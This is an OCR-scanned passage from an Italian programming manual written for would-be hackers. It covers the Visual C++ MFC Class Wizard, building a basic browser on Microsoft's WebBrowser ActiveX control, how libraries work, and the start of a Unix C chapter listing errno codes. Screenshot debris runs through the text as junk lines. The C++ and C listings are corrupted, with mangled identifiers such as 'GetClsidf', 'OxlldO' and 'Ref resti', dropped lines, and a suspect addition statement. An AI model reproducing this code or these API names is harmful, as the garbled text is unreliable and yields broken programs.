Il class wizard ci permette di fare due cose e precisamente di attribuire dei nomi agli oggetti e 
di intercettare gli eventi su di questi. 

Per creare tre variabili che identificheranno i tre campi selezioniamo il tabulatore Member 
Variables. 

I questo ci verranno mostrati gli oggetti a video. 

Selezionandoli e scegliendo Nuova Variabile potremo selezionare un nome identificativo e un 
tipo. 



MFC dì«: Wizard 




Scegliamo IDC_EDIT1 , premiamo Add Variable e damogli un nome e selezioniamo come tipo 
INT 



Add Member Variable 



Member variable nanne: 
| nn_Valore1 

Category: 
IValue 



□ K 



Cancel 



| ini: 




GB IT" 


UINT 




long 




DWORD 




Description: 



int with validation 



Ripetiamo cambiando nome per tutti i tre i campi di edit. 

In pratica nel nostro programma avremo tre variabili m_Valore1 , m_Valore2 e m_Valore3 che 
avranno tutte le proprietà dei campi Cedit. 
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Andate a vedere le proprietà dei campi Cedit e vedrete quali sono i metodi che permettono di 
gestirle. 

Ora dovremo invece intercettare il messaggio creato premendo il pulsante. 

Seezioniamo il pulasante e dopo aver pigiato il tasto destro del mpuse selezioniamo Class 

Wizard. 

Questa volta però selezioneremo il tabulatore Message Map. 

In base ai tipi di messaggi possibili per il tipo di oggetto selezionato ci verranno mostrate le 
possibilità di scelta. 

Nel caso di pulsanti della classe Cbutton i messaggi possibili sono BN_CLICKED e 
BN:DOUBLECLICKED. 

Selezioniamo il primo e premiamo Add Function. 



5)3 



Obkcl.pi; U-ywx 
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l^on | 




Zi 



Dopo la creazione nela lista in basso comparirà la fnzione relativa alla gestione del 
messaggio. 

Selezioniamo direttamente edit code in modo da entare subito nell'edit della funzione. 



void CProvaDlg::OnButton1() 
{ 

// TODO: Add your control notification handler code here 



Posizioniamocie dentro e scriviamo : 

void CProvaDlg::OnButton1() 

{ 

UpdateData(TRUE); 
m_Valore3 = m_Valore2 + m_Valore3; 
UpdateData(FALSE) 



La prima e l'ultima funzione UpdateData() servono ad aggiornare i campi. 

Con parametro TRUE legge i valori dalla dialog e li assegna alle variabili, mentre con 

parametro FALSE dfa il contrario. 

In questo caso il programma è terminato. 

Basterà compilarlo e provarlo. 

L'esempio era solo orientato a farvi vedere come è possibile creare variabili che 
rappresentano oggetti di una certa classe e come ciascuna di queste possiede attributi e 
metodi atti a gestirle. 

Ricordatevi sempre che le classi sono tante e i metodi sono un infinità per cui è sempre 
necessario avere l'help sottomano. 

Andando a vedere per ogni tipo di classe vedrete la gerarchia, ad esempio quella che segue 
è relativa ai campi di tipo Cedit. 
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CEdit 



c 


;Obje:t 










CCrndTarget 



CWnd 



Ora vedremo a caso alcune classi particolari dalle quali si potrà comprendere la logica di 
funzionamento del Visual C++. 

Sicuramente il discorso della programmazione in Visual C++ non è una cosa che è possibile 
apprendere soltanto leggendo le poche pagine di questo testo, ma sicuramente vedendo 
come vengono gestiti certi tipi di oggetti risulterà più semplice comprendere la logica che poi 
alla fine è alla base di tutti gli oggetti inclusi in un linguaggio Visual. 
Ve lo ripeto nuovamente. 

Quando scrivete un programma pensate passo a passo tutto quello che deve fare questo e 
cercate nell'ambito degli oggetti a disposizione quelli che dispongono delle caratteristiche 
migliori per riuscire a risolvere certi tipi di problemi. 

Quando tenevo corsi di programmazione come primi algoritmi dicevo agli alunni di gestire 
quello relativo al compito di alzarsi da dove si è seduti e di andare a comprare le sigarette. 
Questo problema eseguito a step si risolverebbe in un serie di azioni e di valutazioni 
mediante le quali si esegue la scelta delle istruzioni successive. 
Ad esempio potremmo dire : 

Ci alziamo 

Iniziamo a camminare 

Arrivati alla porta guardiamo se questa è aperta 

Se è chiusa la apriamo 

Se è già aperta proseguiamo a camminare 



lo programma è la stessa cosa. 

Pensate a cosa dovete fare partendo dal presupposto che logicamente il tutto lo possiamo già 
suddividere in alcuni tipologie di azioni come ad esempio : 

OPERAZIONI LEGATE ALLA GESTIONE DELL'INPUT/OUTPUT DALL'INTERFACCIA UTENTE 
OPERAZIONI DI MEMORIZZAZIONE SU FILES DEI DATI 
OPERAZIONI INTERNE DI CALCOLO 



Pensate che gran parte del programma è sempre legato alla gestione del dialogo con l'utente. 
Il controllo dei dati inseriti occupa gran parte degli algoritmi tanto che se il programma fosse 
di fatto per uso personale potremmo ridurre notevolmente il codice eliminando quello relativo 
ai controlli, agli abbellimenti estetici, all'adattamento dei dati ecc. 

Ad esempio se un istruzione di memorizzazione in database di una data pretendesse il 
formato : 

#1 2/27/2001 # 

per uso personale potremmo scrivere direttamente la data in quel modo cosa che se invece il 
programma è destinato a qualche altra persona sarebbe impensabile pretendere che questa 
scrivesse in questo modo la data richiesta. 

Tutto questo per dire che, come ho appena detto, l'help indirizzato alla ricerca delle 
funzionalità è una cosa fondamentale. 
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□ Class Library Reference 



Class Library Reference 



El ^ Hierarchy Chart 

El ^ Class Library Overview 

El ^ CAnimateCtrl 

E ^ CArchive 

E ^ CArchiveException 

E ^ CArray 

E ^ CAsyncMonikerFile 

E ^ CAsyncSocket 

E ^ CBitmap 

E ^ CBitmapButton 

E ^ CBrush 

E ^ CButton 

E ^ CByteArray 

E ^ CCachedDataPathProperty 

E ^ CCheckListBox 



Dovete inserire un valore di un IP ? 

Cercate nelle classi e troverete la classe CIPAddressCtrl che permette di gestire l'input nel 
formato giusto. 

Una volta trovata la classe guardate i metodi che contiene per vedere come è possibile 
leggere il valore imputato, come cambiare la formattazione, ecc. 



Nell'immagine di prima vediamo appunto i metodi della classe portata ad esempio. 
Se ad esempio volessimo gestire su una nostra dialog un campo di questo tipo, lo potremmo 
posizionare visivamente, dichiarare una variabile derivata da questa classe mediante il Class 
Wizard e poi usare tramite il nome da noi assegnato tutti metodi che ci interessa usare per 
svolgere certi compiti. 

Supponendo che abbiamo chiamato ipValue la variabile della classe CIPAddressCtrl, 
potremmo sapere se il valore è nullo tramite la chiamata a : 

if(ipValue.lsBlank()) .... 

Riporterò nuovamente la metodologia di creazione di un programma sperando che serva a 
chiarire il concetto da cui parte la creazione di un programma. 

Esistono alcune argomentazioni le cui caratteristiche vengono riportate su volumi che non di 
rado superano le 800 pagine. 

Prendiamo ad esempio il manuale di Microsoft Jet che possiede 800 pagine pulite. 

Alcune volte tutti i nozionismi riportati su questi risultano esagerati per gli scopi che ci si 

prefigge di raggiungere e comunque un inizio più' dolce a volte riesce ad evitare la confusione 

che spesso nasce scontrandosi all' inizio con documentazioni ciclopiche. 

Come dicevo spesso un piccolo esempio funzionante costituisce una buona base su cui poi 

aggiungere tutti gli altri nozionismi. 

Nel caso del Visual C++ esiste il Developer Studio con il suo Class Wizard che permette di 
raggiungere immediatamente dei risultati. 



E 1^2 CIPAddressCtrl 



CIPAddressCtrl Class Mennbers 



E Mernber Functions 




□ PAddressCtrl: : CI PAddressCtrl 
CI PAddressCtrl: : ClearAddress 
CI PAddressCtrl:: Create 
CI PAddressCtrl: : G etAddress 
CI PAddressCtrl: :lsBlank 
CI PAddressCtrl: :S etAddress 
CI PAddressCtrl: : S etFieldFocus 
CI PAddressCtrl: : S etFieldR ange 
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Senza contare che a volte quello che si riesce fare con questo e' più' che sufficiente per 
quello che si vuole fare. 

1 1 seguente capitolo non contiene un trattato di teoria pura ma, argomento 
dopo argomento, mostra come affrontare certe problematiche con il class 
wizard, nella forma sufficiente per permettere all'utilizzatore di scriversi 
alcune piccole utility. 

Tutti gli esempi sono semplicissimi e vengono mostrati passo a passo anche con I' aiuto di 
immagini. 

La semplicità sta nel fatto che qui la programmazione vuole essere solo uno dei tanti 
strumenti che l'hacker completo deve possedere. 

Come abbiamo già detto tutti gli argomenti trattati in questo libro possono essere relativi sia a 
Windows che a Linux. 

Il discorso sulla programmazione relativo al secondo ambiente verrà visto in un capitolo 
indipendente. 

In ogni caso qui non ci si prefigge traguardi complicati ma si vuole solo mostrare le tecniche 
per eseguire certe funzioni. 

Se ad esempio I' argomento sono le finestre suddivise magari le dialog che verranno create 

per costituire le viste non conterranno neppure campi. 

Una volta imparata la tecnica i campi da inserire li selezionerete voi. 

Normalmente sono sempre stato ostile a certi volumi che seguivano esageratamente passo a 
passo la creazione di un programma preferendo altri testi che curavano maggiormente I' 
aspetto teorico fornendo quantità' notevoli di nozionismi entro i quali spesso era complicato 
raccapezzarsi. 

Anche gli altri volumi che avevo scritto erano indirizzati a persone che conoscevano la 
materia. 

In questo caso ho voluto dedicare quanto segue a tutte quelle persone che hanno iniziato da 
poco. 

Non e' neppure richiesta una conoscenza molto approfondita del C++ in quanto, come ho già' 
detto, gli esempi sono documentati passo a passo e le linee di codice da scrivere sono 
veramente pochissime. 

Una cosa molto importante da capire in relazione al discorso fatto fino ad ora legato alla parte 
algoritmica è quello che permette di comprendere come sono strutturate le librerie di funzioni. 
In altre parti del volume abbiamo visto come di fatto viene trattato il programma dalla copia di 
programmi costituita dal compilatore e dal link e quindi qui non ripeteremo il discorso dal 
punto di vista a basso livello ma semplicemente specificheremo quello che è il concetto di 
libreria. 

Questo concetto è importantissimo in quanto successivamente utilizzeremo alcune librerie di 
funzioni legate alla creazione e alla manipolazione dei protocolli. 

Con il passare degli anni anche il concetto di libreria si è modificato anche se soltanto a livello 
pratico di utilizzo e non dal punto di vista concettuale. 

Una libreria come tutti facilmente capiscono è di fatto una raccolta di testi, ciascuno dei quali 
tratta i suoi argomenti. 

Se dovessimo sviluppare qualche ricerca legata ad uno di questi sarebbe sufficiente andare a 
cercare il volume che tratta questo e utilizzarlo per quello che ci offre. 
La stessa cosa è nell'ambito della programmazione. 

Come avete visto le funzioni possono essere viste come raccolte di linee di programma 
orientate alla soluzione di un determinato problema. 

La scrittura di queste in un modo sufficientemente indipendente dal programma ci 
permetterebbe di salvare questa funzione da qualche parte, in formato già compilato, e quindi 
di utilizzarla in altri programmi facendo semplicemente riferimento al suo nome. 
Il corpo con il codice operativo verrebbe poi aggiunto al nostro programma senza avere la 
necessità di riscriverlo. 

In pratica il link eseguirebbe, se cosi si può dire, una copia del codice compilato dentro al 
nostro software. 

Una libreria non è una sola funzione ma un insieme di queste. 

Dicevamo prima che con il passare del tempo la tipologia delle librerie è cambiato. 
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Siamo passati dalle librerie statiche classiche, quelle che avevano come estensione .LIB , a 
quelle dinamiche incluse dentro a determinate DLL fornite con sistemi operativi come 
Windows. 

Stiamo parlando di quest'ultimo OS in quanto altri come Unix possiedono ancora soltanto il 
primo tipo. 

L'evoluzione degli strati relativi al sistema operativo ha permesso l'inserimento di nuove 
tecnologie le quali sono state utilizzate per adottare altri sistemi per fornire ai programmi 
funzionalità derivanti da moduli esterni preesistenti. 

Sto riferendomi sempre ad un'altra tecnologia Microsoft ed esattamente a quella legata ad 
ActiveX. 

Facciamo un esempio pratico. 

Tanti anni fa, agli albori dell'informatica domestica, quando uno si trovava nella necessità di 
scrivere un determinato software l'unica soluzione era quella di studiarsi gli algoritmi di 
gestione, come ad esempio rifacendosi agli algoritmi descritti matematicamente in volumi 
come in quelli intitolati "L'arte della programmazione dei computer" di Knuth, e quindi la loro 
riscrittura nel formato supportato dal linguaggio scelto. 

Con il passare del tempo molte società commerciali e non hanno incorporato dentro a librerie 
distribuite pubblicamente delle funzioni e quindi i programmatori si sono ritrovati sempre di pù 
con dei patrimoni funzionali già esistenti. 

Lo stesso linguaggio C, come abbiamo visto prima, non supporta quelle definite come 
variabili stringa, ovvero con al loro interno sequenze di caratteri ASCII. 
In ogni caso lo stesso linguaggio dispone di funzioni che permettono di manipolare queste 
sequenze dando l'impressione di trattare delle stringhe. 

Questo perché con il linguaggio C sono state fornite delle librerie standard le quali 
includevano alcune funzioni come ad esempio quelle legate alla manipolazione di stringhe 
(strcpy,strcmp, strcat ecc.) 

Qualsiasi programmatore che dovesse gestire delle stringhe non avrebbe più dovuto 
riscrivere gli algoritmi idonei ma sarebbe stato sufficiente che questo facesse riferimento a 
queste funzioni e poi in fase di link che collegasse i files .LIB con all'interno il codice di 
queste. 

Questo metodo collega staticamente la libreria in memoria in modo tale che alla lettura del file 
eseguibile queste funzioni verrebbero lette anch'esse all'interno di questa. 
L'evoluzione legata a Windows ha portato alla scrittura delle librerie dinamiche le quali 
funzionalmente sono identiche alle altre statiche solo che il caricamento in memoria avviene 
solo al momento del richiamo delle funzione. 

In pratica la libreria invece di essere presente dentro ad un file .LIB è contenuta dentro ad un 
file .DLL la quale viene letta al momento del suo utilizzo ed oltre tutto può essere condivisa da 
più programmi. 

Capite che esistono alcune librerie standard e quindi nel caso del vecchio DOS i programmi 
potevano essere letti uno per volta e quindi anche le librerie collegate ai software sarebbero 
state presenti nella RAM solo abbinate ad un singolo programma. 

La gestione multitasking offerta da Windows ha fatto si che più programmi potessero essere 
letti in memoria allo stesso tempo. 

La libreria dinamica permette la condivisione di questa tra più moduli eseguiti. 

La metodologia ACTIVEX a permesso di creare un altro sistema adatto ad ofrire funzionalità 

particolari in ambiente Windows. 

Tutti i linguaggi presenti in questo ambiente possono espandere le loro funzionalità 
selezionando dalle varie toolbar presenti nei sistemi di sviluppo, gli oggetti OCX 
precedentemente letti e resi disponibili. 

Possiamo fare un esempio molto semplice che ci permette di scriverci la nostra base relativa 
ad un intero BROWSER Internet. 

Utilizziamo Visual Studio per crearci una base sulla quale successivamente potremo 
aggiungere altre funzioni facendo diventare il software un nostro strumento personalizzato. 
Prima di iniziare possiamo dire che Microsoft ha inserito le funzioni legate alla gestione di un 
BROWSER dentro ad un activex presente tra quelli del nostro sistema. 
Iniziamo il progetto selezionando dal menu FILE la voce NEW e successivamente 
selezionando progetto MFC eseguibile 
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f MFC ActiveX ControIWizard 
|MFCAppWizard (dll) 



MFC AppWizard (exe) 



^ N e w D atabase Wizard 
VI Utilihi) Project 
Win32 Application 

^] Win32 Console Application 

< I 



|~~ Dependency of: 



api 



~3 



Platfornns: 
|0Win32 



□ K 



Cancel 



Diamo un nome al progetto e andiamo avanti selezionando poi come tipologia quella legata 
all'interfaccia singolo documento. 
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Selezioniamo le opzioni di default fino all'ultima maschera dopo di che 
Visual Studio genererà il codice e selezioniamo in questa la vece 
Cf ormView sotto BaseClass. 




CMahFrmne 



OLI 





Clais nane: 
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Dopo che il sistema di sviluppo ci posizionerà nella finestra di partenzaza dovremo importare 
dentro alla toolbar con gli oggetti posizionabili sulla dialog appena creata quello relativo al 
browser internet presente nel nostro sistema come ActiveX. 

Selezioniamo PROJECT->ADD TO PROJECT->COMPONENTS AND CONTROLS e poi 
ancora REGISTERED ACTIVEX CONTROLS. 
Ora scegliamo MICROSOFT WEB BROWSER. 

Visual studio ci avvertirà dell'intenzione di creare la classe con all'interno I dati e I metodi di 
quest'oggetto all'interno del file CWebBrowser2.h. 

Il link avviene dinamicamente con l'activeX che contiene questo componente ma la 
dichiarazione degli oggetti la potremo fare usando le specifiche definite dentro a questo file di 
INCLUDE. 

Ora all'interno della TOOLBAR dove sono presenti i componenti inseribili dentro alla dialog 
che abbiamo editata a video, ci troviamo anche l'icona relativa al componente appena 
importato. 

Piazziamo ora il controllo i modo che questo tenga quasi tutta la dialog con l'esclusione di 
una parte in alto in cui dovremo inserire il campo dove specificare il link all' URL. 
Ingrandiamo anche la dialog portandola a dimensioni sufficientemente ampie da sembrare un 
browser vero e proprio. 

Inseriamo in alto due pulsanti per eseguire la navigazione avanti ed indietro, due per lo stop e 
per il reload e poi inseriamo anche un campo d'edit. 




Al momento dell'importazione del componente OCX il sistema di sviluppo ha creato una 
classe con all'interno tutti i metodi e le proprietà relative al Browser Microsoft. 
La classe può essere utilizzata per la definizione di una variabile la quale rappresenterà il 
nostro browser all'interno del programma. 

class CWebBrowser2 : public CWnd 
{ 

protected: 

DECLARE_DYNCREATE (CWebBrowser2 ) 

public: 

CLSID consti GetClsidf) 
l 

static CLSID const clsid 

= { 0x8856f961, 0x340a, OxlldO, { 0xa9, 0x6b, 0x0, OxcO, 0x4f, 

0xd7, 0x5, 0xa2 } } ; 

return clsid; 

} 

virtual BOOL Create (LPCTSTR IpszClassName, 

LPCTSTR IpszWindowName, DWORD dwStyle, 

const RECT& rect, 

CWnd* pParentWnd, UINT nID, 

CCreateContext* pContext = NULL) 
{ return CreateControl (GetClsid ( ) , IpszWindowName, dwStyle, rect, pParentWnd, 

nID); } 
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BOOL Create (LPCTSTR IpszWindowName, DWORD dwStyle, 

const RECTS rect, CWnd* pParentWnd, UINT nID, 
CFile* pPersist = NULL, BOOL bStorage = FALSE, 
BSTR bstrLicKey = NULL) 
{ return CreateControl (GetClsid ( ) , IpszWindowName, dwStyle, rect, pParentWnd, 

nID, 

pPersist, bStorage, bstrLicKey) ; ) 

// Attributes 
public: 

// Operations 
public: 

void GoBack () ; 
void GoForward() ; 
void GoHome(); 
void GoSearch () ; 

void Navigate (LPCTSTR URL, VARIANT* Flags, VARIANT* TargetFrameName, VARIANT* 
PostData, VARIANT* Headers) ; 
void Ref resti () ; 

void Ref resh2 (VARIANT* Level) ; 
void Stop () ; 

LPDISPATCH GetApplication () ; 
LPDISPATCH GetParent () ; 
LPDISPATCH GetContainer () ; 
LPDISPATCH GetDocument () ; 
BOOL Get TopLevel Cont ainer () ; 
CString GetTypef); 
long GetLeft(); 
void SetLeft (long nNewValue) ; 
long GetTop () ; 

void SetTop (long nNewValue) ; 

long GetWidth() ; 

void SetWidth (long nNewValue) ; 

long GetHeight ( ) ; 

void SetHeight (long nNewValue) ; 

CString GetLocationName () ; 

CString GetLocationURL ( ) ; 

BOOL GetBusyO; 

void Quit () ; 

void ClientToWindow (long* pcx, long* pcy) ; 

void PutProperty (LPCTSTR Property_, const VARIANT& vtValue) ; 

VARIANT GetProperty_ (LPCTSTR Property_) ; 

CString GetName () ; 

long GetHwnd() ; 

CString GetFullName ( ) ; 

CString GetPath () ; 

BOOL GetVisible () ; 

void SetVisible (BOOL bNewValue) ; 

BOOL GetStatusBar () ; 

void SetStatusBar (BOOL bNewValue) ; 

CString GetStatusText () ; 

void SetStatusText (LPCTSTR IpszNewValue) ; 

long Get ToolBar () ; 

void SetToolBar (long nNewValue) ; 

BOOL GetMenuBar () ; 

void SetMenuBar (BOOL bNewValue) ; 

BOOL GetFullScreen() ; 

void SetFullScreen (BOOL bNewValue) ; 

void Navigate2 (VARIANT* URL, VARIANT* Flags, VARIANT* TargetFrameName, VARIANT* 
PostData, VARIANT* Headers); 

long QueryStatusWB (long cmdID) ; 

void ExecWB (long cmdID, long cmdexecopt, VARIANT* pvaln, VARIANT* pvaOut) ; 
void ShowBrowserBar (VARIANT* pvaClsid, VARIANT* pvarShow, VARIANT* pvarSize) ; 
long GetReadyState () ; 
BOOL GetOffline(); 
void SetOff line (BOOL bNewValue) ; 
BOOL GetSilent () ; 
void SetSilent (BOOL bNewValue) ; 
BOOL GetRegisterAsBrowser () ; 
void SetRegisterAsBrowser (BOOL bNewValue) ; 
BOOL GetRegisterAsDropTarget () ; 
void SetRegisterAsDropTarget (BOOL bNewValue) ; 
BOOL GetTheaterMode () ; 
void SetTheaterMode (BOOL bNewValue) ; 
BOOL GetAddressBar () ; 
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BOOL GetRssizable () ; 

void SetResizable (BOOL bNewValue) ; 



ì; 



La struttura riportata mostra i metodi tra cui ad esempio 



void GoBackf); 
void GoForward() ; 
void GoHome(); 
void GoSearch () ; 
void Refresh () ; 



che corrispondono ai normali tasti destinati alla navigazione che ritroviamo dentro a Internet 
Explorer. 

Ora dobbiamo creare una variabile la quale si interesserà di contenere la stringa relativa al 

URL specificato dentro al campo CEdit posizionato sulla dialog. 

Per fare questo premiamo il tasto destro del meduse e selezioniamo ClassWizard. 

Sui tabulatori premiamo il tab con Member Variables. 

In una lista ci verranno mostrati gli ID dei componenti inseriti sulla dialog. 

Scegliamo quello legato al campo d'edit e premiamo i pulsante AddVariable. 

Diamo alla variabile il nome di mJJrl come mostrato nell'immagine che segue. 



rtdd *1cmbet Variabili 
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A questo punto questa variabile servirà a leggere il valore da utilizzare come link per la 
navigazione. 

Per rendere valida la lettura dovremo intercettare la perdita di fuoco del campo d'edit. 
In altre parole ci posizioneremo nel campo, specificheremo l'URL e quando con il tasto TAB 
usciremo da questo il browser leggerà il valore e lo utilizzerà con le funzioni presenti 
nell'oggetto BROWSER. 

Questo significa che da questa mascher in cui abbiamo creato la nuova variabile ne dovremo 
creare un'altra relativa all'oggetto BROWSER. 

Selezioniamo l'I D di questo e premiamo nuovamente il tasto ADD VARIABLE. 
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La variabile la chiamiamo m_Browser. 

Ora selezioniamo il tabulatore MessageMaps sempre presente nella dialog su cui abbiamo 
dichiarato le variabili. 

Dopo aver selezionato l'I D relativo al campo d'edit nella lista a fianco ci verranno mostrati i 
messaggi che possiamo intercettare relativi a quale tipo di oggetto e tra questi vediamo 
appunto EN_KILLFOCUS. 

Posizioniamoci selezionando questo messaggio e premiamo il pulsante add Function. 
Diamo un nome, quello d default propostoci, alla funzione. 




Dopo che il sistema di svilppo ha creato la funzione possiamo editarla per aggiungerli il 
codice interna, mente ovvero quelle istruzioni che ci permetteranno di leggere il valore del 
campo e di utilizzarlo con i metodi dell'oggetto browser definito precedentemente nei passi 
visti prima. 

Premiamo Edit Code e all'interno della funzione in cui ci troveremo scriviamo il seguente 
codice. 

Per navigare su un URL esiste il metodo dentro alla classe legata al browser che ha la 
seguente sintassi : 

HRESULT Navigate2( 
VARIANT *URL, 
VARIANT *Flags, 
VARIANT * TargetFrameName , 
VARIANT *PostData, 
VARIANT *Headers 



Il codice da aggiungere sarà del tipo : 

void CMyBrowserView : : OnKillfocusEditl () 
{ 

// Esegue 1 'aggiornamento delle variabili legate ai componenti sulla dialog 
// inserendogli i valori specificati . 
UpdateData (TRUE) ; 

/ / Controlla che la lunghezza del valore relativo ali ' URL sia valido 
if(m_Url.GetLength() < 1) 
return; 

// Usando la URL dentro a m_Url usiamo il metodoNavigate 

try 

{ 

COleVariant var; 

m_browser . Navigate (m_Url, var, var, var, var); 

} 

catch (COleDispatchException* pExcept) 
{ 

if (pExcept->m_wCode ) 
{ 

pExcept->Delete () ; 
throw; 

} else 
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Ora dovremo solo più' abbinare ai tasti che permettono di andare avanti ed indietro le funzioni 
idonee prese tra i metodi della classe Browser. 

Selezioniamo i pulsanti nella lista degli ID quello relativo al pulsante Avanti. 
Scegliamo il messaggio BN_CLICKED e premiamo il pulsante AddFunction. 
Editiamo la funzione e scriviamoci il seguente codice. 



void CMyBrowserView : : OnButtonl () 
{ 




Stessa procedura per il pulsante indietro ma qui il codice è : 

void CMyBrowserView: : OnButton3 ( ) 
{ 

m_Browser . GoBack () ; 

} 

Nel caso del pulsante Stop il codice invece è : 



void CMyBrowserView : : OnButton4 () 
{ 




L'ultima funzione legata al pulsante Refresh è : 

void CMyBrowserView : : 0nButton2 ( ) 
{ 

m_Browser . Refresh () ; 

A questo punto potremmo anche inserire altri pulsanti legati a funzione come ad esempio 
quella HOME che ci posiziona sul sito di default e cosi via ma in ogni caso imparato il 
metodo, dando un occhiata alle funzioni dentro alla classe del browser, la cosa risulta essere 
facile da fare. 

Compiliamo il programma e lanciamolo inserendo un indirizzo tanto per provare il quale 

potrebbe anche corrispondere ad una pagina locale al vostro computer. 

Cosi avrete scritto il vostro primo BROWSER che poi con le idee più chiare potrete ampliare 

aggiungendogli altre funzioni magari anche legate all'hacking. 

Avreste pensato che scrivere un browser è cosi semplice ? 

Proviamo e viediamo che tutto funziona. 
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Capisco che tutte queste pagine legate allo sviluppo alcuni potrebbero non comprenderle ma 
la capacità di sapersi scrivere i programmi necessari alla creazione di funzioni particolari è di 
fatto il punto che differenzia lo script kiddie dall'hacker. 

Qui in questo volume lo scopo è quello di spiegare tutte le tecniche che sono necessarie e tra 
queste sicuramente esiste la programmazione. 

Questo, come abbiamo già detto, lo noteremo ancora di più nell'istante in cui dovremo creare 
dei moduli legati a certe tecniche come quelle dei buffers overflow. 



Programmazione in C per ambiente Unix 

Il seguente file non e' una guida completa alla programmazione in linguaggio C, del quale la 
sintassi non verrà' neppure presa in considerazione, e neppure una guida alle chiamate di 
sistema e alle funzioni di libreria del compilatore C in ambiente Unix. 

L'unico scopo che si prefigge e' quello di dare una panoramica sulle diversità' della 
programmazione in ambiente Unix rispetto a quella in Ms Dos. 

In pratica potrebbe essere utile a tutti coloro che già' conoscendo la programmazione in 
C sotto Dos vogliano avvicinarsi a quella di Unix. 

Sotto sistema operativo Unix ci troviamo di fronte ad argomentazioni non esistenti 
in Ms Dos e quindi a nuove possibilità' di sviluppo. 

Prendete ad esempio la possibilità' di creare dallo stesso programma più' processi che 
proseguano per la loro strada e che possano comunicare tra loro mediante diverse 
tecniche (memoria condivisa, pipe, FIFO e messaggi) condividendo risorse il cui accesso 
e' regolato da implementazioni semaforiche. 

Personalmente ritengo che il passaggio di un appassionato di C dall' ambiente MsDos a 
quello Unix sia equivalente al fatto di dotare di un paio di ali alla propria fantasia. 
Spero che negli esempi riportati non ci siano errori anche se sinceramente devo ammettere 
che non anno subito grandi test per il fatto che sono stati tutti scritti nell'istante in cui 
occorreva portare un esempio nel testo. 

Nessuno in ogni caso dispone di una cura particolare nell'estetica in quanto e 
superflua ai fini di fascicolo che, come ho già' detto precedentemente, ha il solo scopo 
di illustrare alcuni punti della programmazione sotto sistema opertivo Unix. 

Gestione degli errori 

Il listati riportati in queste pagine sono solo ad uso dimostrativo dei concetti trattati. 

In molti, per motivi di tempo, non ho incluso nelle funzioni i controlli degli errori ritornati da 

alcune ciamate. 

Questo significa che se implementate in qualche programma dovranno essere 
arrotondate e completate per dare la possibilità' al programma stesso di regolarsi in base ai 
valori restituiti. 

Prendiamo, per fare un esempio, la funzione open() che apre un file restituendo I' handle 
o -1 nel caso che si verifichi un errore. 

Fate attenzione che quasi tutte le chiamate di sistema ritornano -1 per segnalare un errore. 
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La forma esatta dovrebbe essere : 

void printerror (stringa) 

char *stringa; 

{ 

printf C " \nERRORE : %s", stringa); 

/* Eventuale test della variabile ermo */ 

/* e indirizzamento su alcune funzioni. */ 

} 



if((fd = open ("file. txt",0_RDONLY) ) == -1) 
printerror ( "Open s file . txt ' ! ") ; 



Sul fascicolo probabilmente comparirà' solo 



e quindi l'esempio che lo riporta avrà' un funzionamento corretto solo se la funzione non 
cade in qualche errore in quanto non avrà' modo di accorgersene. 
In ogni caso voglio precisare che ogni errore prodotto da una chiamata al sistema setta 
nella variabile ermo il codice relativo all'errore incontrato. 

La funzione perror(), chiamata successivamente, produce la stampa del messaggio d'errore. 
Un implementazione della perror() in funzioni che potrebbero ritornare errori potrebbe 
essere 

if((fd = open (" file, dat", 0_RDONLY) ) == -1) { 
perror ( "Open ") ; 




I codici d'errore definiti in errno.h hanno i seguenti significati. 

1 EPERM - Not owner 

Indica che si e' tentato di modificare il modo di un file senza esserne il proprietario o 
essere il super user. 

2 ENOENT - No such file or directory 

Viene segnalato quando un determinato file non esiste o quando un percorso risulta 
essere errato. 

3 ESRCH - No such process 

Il processo identificato da pid passato come argomento a una funzione come kill() non 
esiste. 

4 EINTR - Interrupted system cali 

Significa che un processo e' stato raggiunto da un segnale mentre era in atto una 
chiamata di sistema. 

5 EIO - I/O error 

Si verifica quando esiste un errore fisico di I/O 

6 ENXIO - No such device or address 

Viene segnalato nel caso in cui ci si riferisca a un device inesistente con una funzione di 
I/O. 

7 E2BIG - Arg list too long 
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Come vedremo ad una funzione execl() e' possibile passare una lista di argomenti. 
Se l'errore si verifica significa che si e' superato i 5120 bytes a disposizione. 

8 ENOEXEC - Exec format error 

I file eseguibili iniziano con quello definito come 'numero magico'. 

II file di cui e' stata richiesta l'esecuzione non ha un formato valido. 

9 EBADF - Bad file number 

In genere si verifica quando con un operazione di read o di write ci si riferisce a un file 
non aperto o quando viene richiesta una funzione di lettura su un file aperto solo in 
scrittura. 

10 ECHILD- Nochildren 

Si verifica quando si utilizza la funzione wait() per attendere il termine di un processo 
figlio inesistente. 

1 1 EAGAIN - No more processes 

Se la tabella dei processi e' piena e viene richiamata la fork() viene settato in ermo 
questo valore. 

12 ENOMEM - Not enoght core 

Il sistema non e' in grado di fornire la memoria richiesta da una chiamata ad una funzione 
come exec(), fork() o brk(). 

13 EACCES - Permission denied 

Si verifica quando si cerca di accedere a un file i cui diritti non permettono di eseguire 
la funzione richiesta. 

14 EFAULT - Bad addres 

Un argomento di una chiamata di sistema punta a una zona di memoria non corretta. 

1 5 ENOTLK - Block device required 

Significa che e' stato richiesto un device a caratteri dove invece necessitava uno a 
blocchi. 

16 EBUSY- Device busy 

Il device richiesto per l'operazione e' occupato. 

Potrebbe anche trattarsi di una richiesta di smontare un device inesistente oppure di 
montarne uno già' presente. 

17 EEXIST- File exists 

Il file specificato in una chiamata non e' adatto alla situazione. 

18 EXDEV - Cross device link 

Quando si cerca di eseguire il link tra due file relativi a device differenti. 

19 ENODEV - No such device 

Si verifica quando si cerca di applicare una chiamata di sistema non adatta ad un 
device. 

20 ENOTDIR - Not a directory 

Omettendo il path name in una chiamata che lo pretende. 

21 EISDIR - Is a directory 

Si ottiene scrivendo in una directory. 

22 EINVAL - Invalid argument 
Argomento non valido 

23 ENFILE - File table overflow 

I file aperti nel sistema vengono marcati in una tavola. 
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Significa che non c'e' più' posto in quest'ultima. 

24 EMFILE - Too many files 

Ogni processo ha a disposizione 20 hadle di file. 
Ci sono più' di 20 files aperti. 

25 ENOTTY - Not a typewriter 

Si verifica non specificando un terminale quando richiesto 

26 ETXTBSY - Text file busy 

L'opzione -n del compilatore CC crea un file eseguibile la cui parte di testo e quella dei 
dati e' separata. 

L'errore si verifica quando si cerca di eseguire un file di questo tipo mentre e' aperto in 
lettura o in scrittura. 

27 EFBIG - File too large 

La dimensione del file supera quella consentita oppure quella stabilita con la funzione 
ulimit(). 

28 ENOSPC - No space left on device 

Non c'e' più' spazio per operazioni di scrittura in un device. 

29 ESPIPE - lllegal seek 

Si e' cercato di eseguire una funzione di posizionamento (Iseek) su una PIPE. 

30 EROFS - Read only file system 

Cercando di modificare un file o una directory presente su un file system abilitato in sola 
